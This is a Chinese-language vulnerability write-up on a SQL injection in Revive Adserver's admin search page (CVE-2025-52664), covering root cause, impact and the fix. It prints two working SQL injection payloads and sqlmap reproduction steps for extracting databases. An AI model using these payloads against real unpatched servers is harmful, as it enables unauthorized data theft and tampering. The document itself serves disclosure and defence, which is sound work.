Revive Adserver SQL注入漏洞技术分析
漏洞概述
在Revive Adserver的管理搜索功能中发现了一个严重的SQL注入漏洞,具体位于admin-search.php文件中。该漏洞存在于keyword GET参数的处理过程中,该参数被传递给多个数据库查询,但缺乏适当的清理或参数化处理。
漏洞根源
漏洞源于使用phpAds_registerGlobalUnslashed()函数注册用户输入变量(包括keyword),但未进行适当的转义:
phpAds_registerGlobalUnslashed('keyword', 'client', 'campaign', 'banner', 'zone', 'affiliate', 'compact');
随后,这些用户控制的输入被直接传递给多个数据库查询函数:
$rsClients = $dalClients->getClientByKeyword($keyword, $agencyId);
$rsCampaigns = $dalCampaigns->getCampaignAndClientByKeyword($keyword, $agencyId);
$rsBanners = $dalBanners->getBannerByKeyword($keyword, $agencyId);
$rsAffiliates = $dalAffiliates->getAffiliateByKeyword($keyword, $agencyId);
$rsZones = $dalZones->getZoneByKeyword($keyword, $agencyId);
即使不检查这些函数的实现,也能明显看出它们在将keyword参数纳入SQL查询之前没有进行适当的清理,从而导致SQL注入。
技术分析
使用SQLMap测试确认了两种不同的SQL注入漏洞:
- 基于错误的注入(使用MySQL的EXTRACTVALUE函数):
Payload: keyword=FUZZ') AND EXTRACTVALUE(8429,CONCAT(0x5c,0x716a7a6a71,(SELECT (ELT(8429=8429,1))),0x7178787871))-- Nqvq&compact=t
- 基于时间的盲注(使用MySQL的SLEEP函数):
Payload: keyword=FUZZ') AND (SELECT 3790 FROM (SELECT(SLEEP(5)))yGYJ)-- YFDA&compact=t
复现步骤
- 打开Burp Suite并使用其内置浏览器
- 访问以下请求:
http://localhost/www/admin/admin-search.php?keyword=FUZZ&compact=t - 使用Burp Suite捕获请求
- 使用
nano testsql.txt将请求保存到文本文件 - 运行以下命令:
sqlmap -r testsql.txt --dbs
您将看到数据库被提取出来
影响范围
此漏洞允许经过身份验证的攻击者:
- 从数据库中提取敏感信息
- 修改或删除数据库内容
- 可能在数据库服务器上执行特权命令
- 通过数据泄露可能升级到更严重的攻击向量
SQLMap测试成功识别了数据库名称,并确认能够通过易受攻击的参数执行任意SQL查询。
根本原因
根本原因是输入验证不当,以及缺乏预处理语句或参数化查询。应用程序直接将用户控制的输入纳入SQL查询,而没有足够的清理或转义机制。
这是Revive Adserver源代码中的一个基本代码缺陷,而不是配置错误的结果。
修复过程
开发团队确认了该漏洞,并提供了一个临时修复补丁。实际上,该漏洞存在于未维护的PEAR MDB2包中,特别是在matchPattern功能中,该功能以错误的顺序应用不同类型的转义,导致字符串转义不当。
团队计划发布6.0.1版本,并请求CVE-ID(CVE-2025-52664),在发布后不久披露报告并发布安全公告。
漏洞状态
- 严重程度:高(8.8)
- 状态:已解决
- CVE ID:CVE-2025-52664
- 弱点类型:SQL注入
经过测试,修复补丁成功缓解了SQL注入漏洞,同时保持了所有搜索功能,查询正常工作且没有错误,输入清理功能正确处理用户输入。
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
公众号二维码
公众号二维码
